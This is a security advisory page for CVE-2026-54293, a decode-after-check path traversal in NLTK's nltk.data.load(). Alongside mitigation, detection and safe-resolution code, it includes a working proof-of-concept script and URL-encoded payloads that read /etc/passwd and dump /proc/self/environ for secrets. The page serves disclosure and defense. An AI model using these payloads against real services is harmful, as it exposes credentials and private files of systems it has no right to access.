CVE-2026-54293: NLTK: path traversal leaks arbitrary local files

GHSA-p4gq-832x-fm9v HIGH
Published June 16, 2026
CISO Take

A decode-after-check flaw in NLTK's nltk.data.load() lets an attacker who can supply the resource name read arbitrary files from the host filesystem. URL-encoding path separators (%2f) and traversal segments slips the payload past the library's documented security regex, and url2pathname() then decodes it into a real path. The CVSS score is 7.5, no authentication or user interaction is required, and a working PoC is already public, so exploitation is within reach of script-level attackers. The EPSS score is low (0.04%, higher than only about 14% of all CVEs), but 2,954 downstream dependents extend the blast radius well beyond NLTK's direct install base, across NLP APIs, ML preprocessing services, and hosted notebook environments. The /proc/self/environ read variant is the primary real-world risk: containerized ML deployments routinely store API keys (OPENAI_API_KEY, ANTHROPIC_API_KEY), cloud provider credentials (AWS_SECRET_ACCESS_KEY), and database connection strings in the process environment, so a single crafted request can lead to full cloud account compromise. No patch is available as of publication. Immediately audit all code paths that pass user-controlled strings to nltk.data.load(), enforce strict allowlisting of permitted resource names, and apply OS-level sandboxing (seccomp, AppArmor, read-only mounts) to NLTK-processing components until a fix lands.

Sources: NVD, EPSS, GitHub Advisory, OpenSSF, ATLAS

What is the risk?

High risk. CVSS 7.5 with AV:N/AC:L/PR:N/UI:N makes this network-exploitable with no authentication and low attack complexity. No official patch exists as of the CVE publication date, leaving the exposure window open-ended. The EPSS score itself is low (0.04%, higher than about 14% of all CVEs), so the rating rests on ease of exploitation and reach rather than on predicted exploitation activity: NLTK is widely deployed across the NLP/ML ecosystem, and its 2,954 downstream packages extend the attack surface far beyond direct installs. Risk is highest in multi-tenant ML platforms, SaaS NLP APIs, and hosted Jupyter/notebook services that accept user-supplied resource identifiers, where exploitation is one API call away from credential exfiltration and lateral movement to cloud infrastructure.

How does the attack unfold?

  1. Target Discovery (AML.T0001)

    Adversary identifies an NLTK-backed NLP API or ML service that exposes user-controlled resource identifiers as parameters passed to nltk.data.load().

  2. Payload Delivery (AML.T0049)

    Attacker submits a crafted request with a URL-encoded path traversal payload (e.g., nltk:%2fproc%2fself%2fenviron) that passes the _UNSAFE_NO_PROTOCOL_RE regex undetected.

  3. Filesystem Access (AML.T0037)

    url2pathname() decodes percent-encoded sequences post-regex-check, causing NLTK to open and return the contents of an arbitrary local file outside the intended corpus directory.

  4. Credential Exfiltration (AML.T0055)

    Attacker extracts API keys, cloud provider credentials, and database connection strings from /proc/self/environ or application config files, enabling immediate lateral movement to cloud infrastructure.
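
The ordering problem behind the Payload Delivery and Filesystem Access steps can be reproduced without NLTK. The sketch below is illustrative only: UNSAFE_RE is a simplified stand-in written for this example (it is not NLTK's _UNSAFE_NO_PROTOCOL_RE), check_then_decode is a hypothetical helper, and urllib.parse.unquote stands in for the percent-decoding that url2pathname() performs.

```python
import re
from typing import Optional
from urllib.parse import unquote

# Simplified stand-in for a traversal filter. This is NOT NLTK's actual regex.
UNSAFE_RE = re.compile(r"^/|(^|/)\.\./")


def check_then_decode(resource: str) -> Optional[str]:
    """Flawed order: validate the raw string first, decode afterwards."""
    if UNSAFE_RE.search(resource):
        return None  # literal traversal is rejected here
    # Decoding happens after the check, so %2f and %2e become live characters.
    return unquote(resource)


for payload in ("../../etc/passwd", "%2fetc%2fpasswd", "..%2f..%2fetc%2fpasswd"):
    print(f"{payload!r} -> {check_then_decode(payload)!r}")
```

The literal payload is rejected, while both encoded payloads pass the check and decode into the very paths the filter was meant to stop.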

What systems are affected?

Package    Ecosystem    Vulnerable Range    Patched
NLTK       pip          <= 3.9.4            No patch
13.2K · OpenSSF 5.8 · 3.0K dependents · Pushed 4d ago · 56% patched · ~454d to patch

Do you use NLTK? You're affected.

How severe is it?

CVSS 3.1: 7.5 / 10
EPSS: 0.04% chance of exploitation in 30 days (higher than 14% of all CVEs)
Exploitation Status: No known exploitation
Sophistication: Trivial

What is the attack surface?

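Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): None
Availability (A): None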

What should I do?

5 steps
  1. PATCH

    No official fix available as of 2026-06-16 — monitor NLTK GitHub advisory GHSA-p4gq-832x-fm9v and upgrade immediately when a patched release is published.

  2. ENFORCE MODE

    If your NLTK version exposes the pathsec flag, set nltk.pathsec.ENFORCE = True at application startup to enable stricter path enforcement.

  3. INPUT ALLOWLISTING

    Never pass external or user-supplied strings to nltk.data.load(); define an explicit allowlist of permitted NLTK resource names and validate all inputs against it before any load() call.

  4. SANDBOXING

    Run NLTK-processing components in OS-restricted environments — apply seccomp-bpf profiles, AppArmor/SELinux policies, and read-only filesystem mounts wherever possible to limit file access blast radius even if exploited.

  5. DETECTION

    Alert on file access to /proc/self/environ, /etc/passwd, /etc/shadow, ~/.ssh/, and application config directories from NLTK-running processes; scan application and proxy logs for nltk: URL scheme usage containing percent-encoded characters (%2f, %2e, %25).
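
Step 3 can be sketched as a thin wrapper that refuses anything not on a fixed list. This is a minimal sketch under stated assumptions: load_allowed and ALLOWED_RESOURCES are hypothetical names introduced here, the two resource names are placeholders for whatever your application actually needs, and the loader is passed in as a parameter so the example runs without NLTK installed.

```python
from typing import Any, Callable

# Hypothetical allowlist; replace the entries with the resources your
# application really loads. Membership is an exact string match.
ALLOWED_RESOURCES = frozenset({
    "tokenizers/punkt/english.pickle",
    "corpora/stopwords/english",
})


def load_allowed(name: str, loader: Callable[[str], Any]) -> Any:
    """Call loader(name) only if name is an exact allowlist entry."""
    if name not in ALLOWED_RESOURCES:
        raise ValueError(f"resource not on allowlist: {name!r}")
    return loader(name)
```

In an application the call would look like load_allowed(user_value, nltk.data.load). Because the comparison is an exact match against known-good names, encoded payloads such as nltk:%2fetc%2fpasswd are rejected without any attempt to recognize traversal patterns.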

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.9.3 - Information security in AI system development
NIST AI RMF
GOVERN 6.2 - Policies for third-party AI component risks
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2026-54293?

CVE-2026-54293 is a decode-after-check path traversal flaw (CWE-22) in NLTK's nltk.data.load(), affecting NLTK <= 3.9.4. An attacker who can supply the resource name can URL-encode path separators (%2f) and traversal segments so that the payload passes the library's documented security regex, after which url2pathname() decodes it into a real path and NLTK returns the contents of an arbitrary local file. The CVSS score is 7.5, no authentication or user interaction is required, and a working PoC is public. Reading /proc/self/environ is the primary real-world risk, because containerized ML deployments routinely keep API keys, cloud credentials, and database connection strings in the process environment. No patch is available as of publication.

Is CVE-2026-54293 actively exploited?

No confirmed active exploitation of CVE-2026-54293 has been reported. Because no patch is available yet, organizations should still apply the mitigations proactively and upgrade as soon as a fixed release is published.

How to fix CVE-2026-54293?

  1. PATCH: No official fix is available as of 2026-06-16. Monitor NLTK GitHub advisory GHSA-p4gq-832x-fm9v and upgrade immediately when a patched release is published.
  2. ENFORCE MODE: If your NLTK version exposes the pathsec flag, set nltk.pathsec.ENFORCE = True at application startup to enable stricter path enforcement.
  3. INPUT ALLOWLISTING: Never pass external or user-supplied strings to nltk.data.load(); define an explicit allowlist of permitted NLTK resource names and validate all inputs against it before any load() call.
  4. SANDBOXING: Run NLTK-processing components in OS-restricted environments. Apply seccomp-bpf profiles, AppArmor/SELinux policies, and read-only filesystem mounts wherever possible to limit file access blast radius even if exploited.
  5. DETECTION: Alert on file access to /proc/self/environ, /etc/passwd, /etc/shadow, ~/.ssh/, and application config directories from NLTK-running processes; scan application and proxy logs for nltk: URL scheme usage containing percent-encoded characters (%2f, %2e, %25).

What systems are affected by CVE-2026-54293?

This vulnerability affects the following AI/ML architecture patterns: NLP processing pipelines, ML training pipelines, hosted notebook environments, multi-tenant ML serving platforms, and AI data preprocessing pipelines.

What is the CVSS score for CVE-2026-54293?

CVE-2026-54293 has a CVSS v3.1 base score of 7.5 (HIGH). The EPSS exploitation probability is 0.04%.

What is the AI security impact?

Affected AI Architectures

NLP processing pipelines
ML training pipelines
Hosted notebook environments
Multi-tenant ML serving platforms
AI data preprocessing pipelines

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0037 Data from Local System
AML.T0049 Exploit Public-Facing Application
AML.T0055 Unsecured Credentials
AML.T0106 Exploitation for Credential Access

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.9.3
NIST AI RMF: GOVERN 6.2
OWASP LLM Top 10: LLM03:2025

What are the technical details?

Original Advisory

### Summary

nltk.data.load() in NLTK is vulnerable to path traversal via URL-encoded path separators and traversal segments when using the nltk: URL scheme. The unsafe-path regex check is performed before url2pathname() decodes the %xx sequences (a classic decode-after-check / TOCTOU-style flaw), allowing an attacker to bypass the protection documented in NLTK's SECURITY.md and read arbitrary files from the filesystem.

While literal traversal strings such as ../../../etc/passwd are correctly blocked, encoded variants such as %2fetc%2fpasswd, %2e%2e%2f..., and ..%2f..%2f slip past the regex and are subsequently decoded into a real filesystem path.

### Affected Component

nltk/data.py: find(), normalize_resource_url(), and the _UNSAFE_NO_PROTOCOL_RE regex check.

Relevant occurrences:

- data.py L650–L653: final path constructed from url2pathname(resource_name) after checks
- data.py L54–L69: _UNSAFE_NO_PROTOCOL_RE operates only on the undecoded string
- data.py L219–L245: normalize_resource_url() for nltk: scheme contributes to decode-after-check
- data.py L615–L618: defense-in-depth traversal check also operates on undecoded input

### Root Cause

The regex _UNSAFE_NO_PROTOCOL_RE is matched against the raw resource string. Path normalization via url2pathname() happens later, so any percent-encoded / (%2f) or . (%2e) is invisible to the regex but becomes active in the final path.

### Proof of Concept

```
"""
NLTK Arbitrary File Read via URL-Encoded Path Traversal
=======================================================
Bypasses _UNSAFE_NO_PROTOCOL_RE security regex in nltk/data.py by
URL-encoding path separators and traversal components.

Affected: NLTK <= 3.9.4 (default ENFORCE=False configuration)
CWE: CWE-22 (Path Traversal)

Root Cause:
    nltk/data.py:find() checks resource names against a regex for
    traversal patterns (../, leading /, etc.) BEFORE calling
    url2pathname() which decodes %xx sequences. This is a classic
    "decode-after-check" vulnerability.
"""
import sys
import os
import warnings

# Suppress NLTK security warnings for clean PoC output
warnings.filterwarnings("ignore", category=RuntimeWarning)

# Setup
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "nltk"))
os.makedirs(os.path.expanduser("~/nltk_data/corpora"), exist_ok=True)

import nltk
from nltk.pathsec import ENFORCE

BANNER = """
===================================================
 NLTK URL-Encoded Path Traversal PoC
 Affected: nltk <= 3.9.4
 Default ENFORCE={enforce}
===================================================
""".format(enforce=ENFORCE)


def test_variant(name, payload, fmt="raw"):
    """Test a single traversal variant."""
    try:
        content = nltk.data.load(payload, format=fmt)
        if isinstance(content, bytes):
            preview = content[:200].decode("utf-8", errors="replace")
        else:
            preview = content[:200]
        first_line = preview.split("\n")[0]
        print(f" [VULN] {name}")
        print(f" Payload: {payload}")
        print(f" Read OK: {first_line}")
        return True
    except Exception as e:
        print(f" [SAFE] {name}")
        print(f" Payload: {payload}")
        print(f" Blocked: {type(e).__name__}: {e}")
        return False


def main():
    print(BANNER)
    vulns = 0

    # --- Variant 1: URL-encoded absolute path ---
    print("[1] URL-encoded absolute path (%2f = /)")
    if test_variant(
        "Encoded leading slash bypasses ^/ regex check",
        "nltk:%2fetc%2fpasswd",
    ):
        vulns += 1
    print()

    # --- Variant 2: Encoded dot-dot traversal ---
    print("[2] URL-encoded dot-dot traversal (%2e = .)")
    if test_variant(
        "Encoded dots bypass \\.\\./ regex check",
        "nltk:corpora/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
    ):
        vulns += 1
    print()

    # --- Variant 3: Literal dots with encoded slash ---
    print("[3] Literal dots with encoded slash (..%2f)")
    if test_variant(
        "Encoded slash after literal .. bypasses \\.\\./ regex",
        "nltk:corpora/..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",
    ):
        vulns += 1
    print()

    # --- Variant 4: Read process environment (credential leak) ---
    print("[4] Read /proc/self/environ (credential leakage)")
    try:
        content = nltk.data.load("nltk:%2fproc%2fself%2fenviron", format="raw")
        env_vars = content.decode("utf-8", errors="replace").split("\x00")
        print(f" [VULN] Leaked {len(env_vars)} environment variables")
        for var in env_vars[:3]:
            if var:
                key = var.split("=")[0] if "=" in var else var
                print(f" {key}=...")
        vulns += 1
    except Exception as e:
        print(f" [SAFE] Blocked: {e}")
    print()

    # --- Control: verify normal traversal IS blocked ---
    print("[CONTROL] Verify literal ../ is blocked by regex")
    test_variant("Direct traversal (should be blocked)", "nltk:../../../etc/passwd")
    print()

    print("=" * 51)
    print(f" Result: {vulns} bypass variant(s) succeeded")
    if vulns > 0:
        print(" Status: VULNERABLE (url2pathname decodes after regex check)")
    else:
        print(" Status: Not vulnerable")
    print("=" * 51)


if __name__ == "__main__":
    main()
```

### Impact

Arbitrary local file read whenever attacker-controlled input reaches nltk.data.load(). Realistic targets include:

- /etc/passwd, /etc/shadow (if readable)
- /proc/self/environ: leaks environment variables, often containing API keys, DB credentials, cloud secrets
- Application source code and configuration files
- Cloud metadata, deployment secrets, SSH keys

This is directly relevant to web applications, hosted notebook services, multi-tenant ML pipelines, and CI/CD systems that pass untrusted resource identifiers into NLTK. NLTK's SECURITY.md explicitly places path traversal within the scope of its protection model, so this is a documented security boundary being broken.
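
A common way to close a decode-after-check gap of this kind is to decode first and then validate the resolved path rather than the raw string. The sketch below is not NLTK's fix (none had been published when the advisory appeared) and does not use NLTK's internals: resolve_inside is a hypothetical helper, base_dir stands for whatever corpus directory an application intends to expose, and urllib.parse.unquote is assumed to mirror the decoding done by the sink.

```python
import os
from urllib.parse import unquote


def resolve_inside(base_dir: str, resource: str) -> str:
    """Decode first, then require the resolved path to stay under base_dir."""
    # Decode exactly once, as the eventual file-opening code would.
    decoded = unquote(resource)
    base = os.path.realpath(base_dir)
    # os.path.join discards base when decoded is absolute; realpath collapses
    # '..' segments and follows symlinks, so the check sees the final target.
    candidate = os.path.realpath(os.path.join(base, decoded))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"resource escapes base directory: {resource!r}")
    return candidate
```

The check runs on the same value that would be opened, so it no longer matters how the separators or dots were spelled in the input. An allowlist of resource names remains the stricter control where the set of resources is known in advance.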

Exploitation Scenario

An adversary targeting a SaaS text-classification or sentiment-analysis API built on NLTK submits a POST request with a crafted resource field set to nltk:%2fproc%2fself%2fenviron. The application passes this value directly to nltk.data.load() as a corpus identifier. The _UNSAFE_NO_PROTOCOL_RE regex inspects the undecoded string and finds no traversal patterns, allowing the call to proceed. url2pathname() then decodes each %2f into /, resolving the path to /proc/self/environ on the host. NLTK opens the file and returns its raw content, which the attacker receives in the API response, including AWS_ACCESS_KEY_ID, OPENAI_API_KEY, DATABASE_URL, and any other secrets injected at container startup. The attacker can then pivot to cloud infrastructure within minutes using the harvested credentials. The entire attack requires no authentication and no prior reconnaissance beyond finding an NLTK-backed endpoint, and it produces minimal application-level log evidence.
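
The crafted value in this scenario has a recognizable shape, so request or proxy logs that record it can be scanned for the nltk: scheme followed by percent-encoded characters. The following is a rough heuristic, not a complete detector: SUSPICIOUS and suspicious_lines are hypothetical names, the sample log lines are invented for illustration, and logs that store values in a further-encoded form would need decoding before matching.

```python
import re
from typing import Iterable, List

# Heuristic: the nltk: scheme followed, within the same token, by an encoded
# '/', '.', or '%' (%2f, %2e, %25). Matching is case-insensitive.
SUSPICIOUS = re.compile(r"nltk:[^\s\"']*%(?:2f|2e|25)", re.IGNORECASE)


def suspicious_lines(lines: Iterable[str]) -> List[str]:
    """Return the log lines that contain an nltk: value with encoded separators."""
    return [line for line in lines if SUSPICIOUS.search(line)]


# Invented sample lines, for illustration only.
sample = [
    'POST /classify resource="nltk:%2fproc%2fself%2fenviron"',
    'POST /classify resource="nltk:corpora/words"',
    "GET /health",
]
for hit in suspicious_lines(sample):
    print(hit)
```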

Weaknesses (CWE)

CWE-22 — Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

  • [Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylis
  • [Architecture and Design] For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
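
The 7.5 base score follows from this vector under the CVSS v3.1 base-score equations. The sketch below applies the specification's metric weights and its Roundup rule; it handles only Scope Unchanged vectors, which is all this CVE needs, and the function names are chosen for this example.

```python
import math

# CVSS v3.1 metric weights (Privileges Required values are for Scope Unchanged).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in the CVSS v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score of a Scope Unchanged CVSS v3.1 vector."""
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    if metrics["S"] != "U":
        raise NotImplementedError("this sketch covers Scope Unchanged only")
    w = {name: WEIGHTS[name][metrics[name]] for name in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"))  # 7.5
```

Here the impact sub-score is 6.42 × 0.56 ≈ 3.60 and the exploitability sub-score is about 3.89, giving roughly 7.48, which rounds up to 7.5.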

Timeline

Published
June 16, 2026
Last Modified
June 16, 2026
First Seen
June 16, 2026

Related Vulnerabilities